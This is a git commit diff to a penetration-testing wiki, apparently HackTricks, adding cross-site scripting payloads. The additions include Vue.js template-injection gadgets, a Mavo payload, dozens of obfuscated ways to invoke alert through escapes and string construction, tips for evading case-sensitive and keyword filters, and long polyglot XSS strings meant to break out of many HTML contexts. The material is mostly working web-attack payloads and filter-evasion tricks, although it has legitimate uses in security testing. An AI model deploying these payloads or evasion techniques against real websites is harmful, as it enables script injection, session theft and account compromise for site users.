GitBook: [master] 2 pages modified
This commit is contained in:
parent
7517161d89
commit
b524d4bca9
|
@ -35,12 +35,30 @@ And the **source code** of the vulnerable example here: [https://github.com/azu/
|
|||
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
|
||||
```
|
||||
|
||||
### **V3**
|
||||
|
||||
```text
|
||||
{{_openBlock.constructor('alert(1)')()}}
|
||||
```
|
||||
|
||||
Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
|
||||
|
||||
### **V2**
|
||||
|
||||
```text
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
|
||||
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
|
||||
|
||||
### Mavo
|
||||
|
||||
Payload:
|
||||
|
||||
```text
|
||||
[self.alert(1)]
|
||||
javascript:alert(1)%252f%252f..%252fcss-images
|
||||
[Omglol mod 1 mod self.alert (1) andlol]
|
||||
```
|
||||
|
||||
|
||||
|
|
|
@ -421,8 +421,60 @@ Set.constructor`al\x65rt\x2814\x29```;
|
|||
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
|
||||
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
|
||||
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
|
||||
globalThis[`al`+/ert/.source]`1`
|
||||
this[`al`+/ert/.source]`1`
|
||||
[alert][0].call(this,1)
|
||||
window['a'+'l'+'e'+'r'+'t']()
|
||||
window['a'+'l'+'e'+'r'+'t'].call(this,1)
|
||||
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
|
||||
(1,2,3,4,5,6,7,8,alert)(1)
|
||||
x=alert,x(1)
|
||||
[1].find(alert)
|
||||
top["al"+"ert"](1)
|
||||
top[/al/.source+/ert/.source](1)
|
||||
al\u0065rt(1)
|
||||
al\u0065rt`1`
|
||||
top['al\145rt'](1)
|
||||
top['al\x65rt'](1)
|
||||
top[8680439..toString(30)](1)
|
||||
```
|
||||
|
||||
### General tricks
|
||||
|
||||
**To constructing strings**
|
||||
|
||||
Regex literals:
|
||||
`/part1/.source+/part2/.source` => `'part1part2'`
|
||||
Numbers to strings:
|
||||
`8680439..toString(30)` => `'alert'` \( Number is generated using parseInt\(“alert”,30\), other bases also work \)
|
||||
|
||||
**use character escape sequences inside of strings**
|
||||
|
||||
simple tool for this is available [here](https://mothereff.in/js-escapes):
|
||||
`"\x41" -> "A"`: hex encoding
|
||||
`"\u0065" -> "A"`: unicode encoding \(value is decimal\)
|
||||
`"\101" -> "A"`: octal encoding
|
||||
|
||||
**VaRy ThE capItaliZatiOn**
|
||||
|
||||
Sometimes a regex or other custom-made filters do case sensitive matching. You can then just use a toLowerCase\(\), like:
|
||||
`globalThis["aLeRt".toLowerCase()]`
|
||||
|
||||
**Calling functions**
|
||||
|
||||
``alert`1``` : Template literal syntax
|
||||
`alert.apply(this,[1])`: Using Function.prototype.apply
|
||||
`alert.call(this,1)`: Using Function.prototype.call
|
||||
`alert(1)`: Obviously, but included for completeness.
|
||||
`[1].find(alert)`: Using predicates
|
||||
`[1].filter(alert)`: Using predicates
|
||||
|
||||
**Reuse and recycle**
|
||||
|
||||
Remember to look into what is already loaded! jQuery is an easy example, but any sufficiently complex framework will likely have something usable. [Wappalyzer](https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en) or equivalent can help here.
|
||||
`window.jQuery.globalEval("alert(1)")`
|
||||
`$.globalEval("alert(1)")`
|
||||
|
||||
## **DOM vulnerabilities**
|
||||
|
||||
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
|
||||
|
@ -667,6 +719,7 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
|
|||
### Polyglots
|
||||
|
||||
```javascript
|
||||
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
|
||||
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
|
||||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||||
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
|
||||
|
@ -685,7 +738,7 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
|||
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
|
||||
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
|
||||
<svg%0Ao%00nload=%09((pro\u006dpt))()//
|
||||
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
|
||||
|
||||
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
|
||||
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
|
||||
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
|
||||
|
|
Loading…
Reference in New Issue